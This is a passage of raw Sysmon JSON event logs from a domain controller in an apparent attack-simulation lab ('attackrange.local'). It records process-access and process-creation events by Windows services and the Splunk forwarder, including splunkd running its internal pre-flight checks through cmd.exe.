C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2a2f2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29e26|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+28432|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.974","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2024","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2a2f2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29e26|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+28432|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1851,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.974\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2024\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25d35|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2619d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.974","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2024","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25d35|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2619d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1852,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.974\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2024\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+261b7|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.974","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2024","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+261b7|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1853,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.130\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-001076950300}\r\nSourceProcessId: 3780\r\nSourceThreadId: 3772\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.130","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-001076950300}","SourceProcessId":"3780","SourceThreadId":"3772","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1854,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.161\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.161","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1855,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.225\r\nProcessGuid: {E2A3D6B1-106D-5F25-0000-0010A6C60300}\r\nProcessId: 3908\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal pre-flight-checks --answer-yes --no-prompt 2>&1\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.225","ProcessGuid":"{E2A3D6B1-106D-5F25-0000-0010A6C60300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal pre-flight-checks --answer-yes --no-prompt 2&gt;&amp;1","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1856,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.224\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 3812\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-106D-5F25-0000-0010A6C60300}\r\nTargetProcessId: 3908\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+eef54|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ebd15|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.224","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"3812","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-106D-5F25-0000-0010A6C60300}","TargetProcessId":"3908","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+eef54|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ebd15|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1857,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.224\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106D-5F25-0000-0010A6C60300}\r\nTargetProcessId: 3908\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.224","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106D-5F25-0000-0010A6C60300}","TargetProcessId":"3908","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1858,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed 